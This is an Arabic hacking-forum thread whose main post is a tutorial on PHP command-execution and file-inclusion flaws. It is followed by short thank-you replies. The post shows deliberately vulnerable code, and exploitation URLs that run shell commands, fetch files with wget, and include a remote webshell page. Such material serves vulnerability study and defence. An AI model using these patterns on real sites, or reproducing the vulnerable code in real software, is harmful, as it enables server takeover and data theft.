 |
 |
 |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
 |
 |
 |
||||||||
|
||||||||||
 |
 |
 |
||||||||
| [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات .. |
 |
|
|
أدوات الموضوع | انواع عرض الموضوع |
13/01/2012, 09:05
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 0
تم شكره 22 مرة في 14 مشاركة
|
لغه برمجه المواقع PHP لغه عالميه تجمع بين قوتها وسهوله تعلمها وهذا سبب انتشارها قد تجد ان اغلب تطبيقات الويب وخاصه التجاريه كتبت بواسطه PHP مثل المنتديات وتطبيقات
الاداره الاخرى. عيب هذه اللغه هو الجانب الأمني وخاصه للمبتدئين في لغه PHP تكمن سهوله هذه اللغه في انها اختصرت اكواد كثيره في لغات برمجه اخرى وجعلتها ضمن داله واحده بمعنى امر واحد دون الدخول في تفاصيل كثيره عن ماتقوم به هذه الداله وهنا يقع المبرمج في أخطاء تؤدي الى حدوث ثغرات أمنية تؤدي بذلك لإختراق الموقع. بعد دراسه هذا الموضوع ستصل الى مرحله تحليل الاكواد التي تكتبها وستسطيع اكتشاف الثغرات الامنيه الخطيرة في لغه PHP التي تؤدي للإختراق المباشر للسيرفر. أولاً: ثغرات تنفيذ الاوامر Command Execution هذا النوع من الثغرات يحدث نتيجه استخدام دوال تنفيذ الاوامر في لغه PHP بشكل خاطئ كيف؟ في البدايه نريد ان نعرف ما هي دوال تنفيذ الاوامر , بإختصار هي دوال تستخدم لتنفيذ برامج النظام بشكل مباشر لتختصر عليك اكواد برمجه اضافيه ومثال على ذلك استخدام برنامج ارسال الايميل /usr/sbin/sendmail وغيرها الكثير من برامج النظام في انظمه يونكس الخطأ في مثل هذه الدوال يسمح للمهاجم من تنفيذ برامج النظام في مصلحته دوال تنفيذ الاوامر في لغه PHP هي: التي تنفذ بشكل مباشر: system و popen و shell_exec و exec هذه الدوال تنفذ اي برنامج نظام يمرر لها بشكل مباشر الآن سنأخذ مثال لطريقه الوقوع في الخطأ وإحداث ثغره تمكن المهاجم من إختراق الموقع لاحظ الكود: Code:<?php system($cmd); ?> لاحظ لو كان إستخدام هذه الداله بنفس الشكل في تطبيقك سيؤدي لإحداث ثغره Command Execution وسيقوم المهاجم بإستغلاله بهذا الشكل: Code:www.jaascois.com/index.php?cmd=يضع هنا اي امر يريد تنفيذه وهو عباره عن برنامج نظام وهذا مثال لعرض المجلدات في السيرفر بإستخدام برنامج النظام ls www.jaascois.com/index.php?cmd=ls تحميل ملف الى السيرفر بإستخدام برنامج النظام wget www.jaascois.com/index.php?cmd=wget xxxxx قد تتوقع ان الموضوع سهل إكتشافه ولكن لو كانت لديك 100 صفحه كود كل صفحه تحتوي 100 سطر في هذه الحاله قد تكون المهمه صعبه ولذلك قد تحتاج مساعده JAAScois X-Code v1.0 برنامج JAAScois X-Code v1.0 يقوم بإتباع طريقه جديده للتحليل وهي كالتالي:- البحث عن الدوال الخطرة وتحديدها وبعد ذلك قرائة البارمترات التي تمرر لها وبعد ذلك إجراء إختبار جديد للبارمتر وهل تمت اي عمليه اختبار لهذا البارمتر بعد التأكد من كل هذه الشروط يتم إظهار الكود على انه ثغره امنيه كما تلاحظ مع تحديد التعليمه والسطر والصفحه النوع الثاني من الثغرات الامنيه الخطرة ثانيا: ثغرات إدراج الملف FileInclusion هذا النوع من الثغرات خطير جدا ويؤدي لإختراق الموقع إدراج الملف هي عملية تقوم بقرائه ملف محدد وتنفيذه ضمن الصفحه الحاليه وهي عمليه تستخدم للإختصار وتوفر على المبرمج كتابه نفس الكود اكثر من مره الدوال المستخدم في عمليه الادراج هي: include و fopen و file و include_once و require و require_once وطريقه الاستخدام معروفه بهذا الشكل: include('index2.php'); تلاحظ ادراج ملف بإسم index2.php ماذا لو كان الكود بدون معالجة بهذا الشكل Code: include($_GET['page']); بالتأكيد يمكن استغلاله بإستخدام الويب شيل او صفحات اداره الموقع وهي عباره عن تطبيقات مكتوبه ب PHP عند فتح الصفحه تجد لوحه تحكم للموقع مثل رفع الملفات وتحرير الصفحات وغيرها ماذا لو قمنا بإدراج صفح تحكم ليتم تنفيذها في الكود السابق بهذا الشكل Code:www.jaascois.com/index.php?page= هنا نضع عنوان صفحه الويب شل او صفحه التحكم مثل http://www.jaascois.com/index.php?pa...m/webshell.php سيقوم تطبيق PHP بتنفيذ داله الادراج وستتم عملية قرائة صفحه الويب شل وتنفيذه في موقعك و ستلاحظ ظهور لوحه التحكم للمهاجم ويستطيع تنفيذ كل شيء في السيرفر عملية التخلص من هذه الثغرات قد تكون بسيطة اما مع التطبيقات الكبيرة تستطيع استخدام JAAScois X-Code v1.0 اتمنى لكم التوفيق معكم Th3 WiTch3r-Dz منقول للفائدة  و
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
| الأعضاء الذين قالوا شكراً لـ Th3 WiTch3r-Dz على المشاركة المفيدة: |
cold (18/01/2012)
|
|
13/01/2012, 10:01
|
المشاركة رقم: 2 | ||||||||||||
|
بارك الله فيك أخي !!! |
||||||||||||
|
|
|
||||||||||||
|
13/01/2012, 10:43
|
المشاركة رقم: 3 | ||||||||||||
|
نورت الموضوع اخي الياس **** لك |
||||||||||||
|
|
|
||||||||||||
|
18/01/2012, 01:37
|
المشاركة رقم: 4 | ||||||||||||
|
يا اخي لو تكرمت و احضرتنا هذا البرنامجالرائع |
||||||||||||
|
|
|
||||||||||||
|
18/01/2012, 06:37
|
المشاركة رقم: 5 | ||||||||||||
|
اوووف و الله ايام jass لقد اختفى من وجه الكرة الارضية هذا الانسان منذ سنوات و البرنامج لم يتم تطويره من فترة طويلة |
||||||||||||
|
|
|
||||||||||||
|
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 24
|
|
| abdoog , ApOcalYpse , bachelor , cold , Damane2011 , DR-HEX , Dr@S!L3NT H!LL , DZ-cOmbattant , HACER DZ , hamza 12 , ilyas0206=DZ , LoNeLy DeViL , moja4ed_fz , moulay2010 , S1LV3rS3rf3r , saanane , sad4lak , salem k , sayar05 , SoUfiaNoXx , Th3 WiTch3r-Dz , The MaSk , عمر الساكر , ViRuS_Ra3cH |
|
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| تم الانتهاء من تصميم اداه vol-tool تحتوي على معظم شلات الهاكر | VoLc4n0 | [ منتدى الأدوات Hacking Tools ] | 18 | 14/04/2015 11:33 |
| [ برنامج ] : برنامج قرآني Qurani أكبر واشمل مصحف فى العالم بصوت معظم المقرئين | ADMINISTRATOR | [ منتدى البرامج الكاملة والمشروحة ] | 0 | 06/08/2011 00:11 |
| قوقل تحدث خوارزميات البحث لحل مشكلة ظهور المحتوى السيء في نتاج البحث | ADMINISTRATOR | [ منتدى اخبــــار الشبكـــة] | 0 | 25/02/2011 04:36 |
| درسَ يــنفعَ للمبتدئين ( شرح الثغرات ، استخراج الثغرات بالميل روم | prosk | [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] | 4 | 30/11/2010 19:35 |
| {19}الدورك في الثغرات DorK بحث {19} | ViRuS_Ra3cH | دورة اختراق المواقع والسيرفورات | kala$nikov | 0 | 18/03/2010 14:59 |
 |
 |
 |
البحث عن معظم الثغرات ببرنامج JAAScois X-Code v.10
العرض العادي
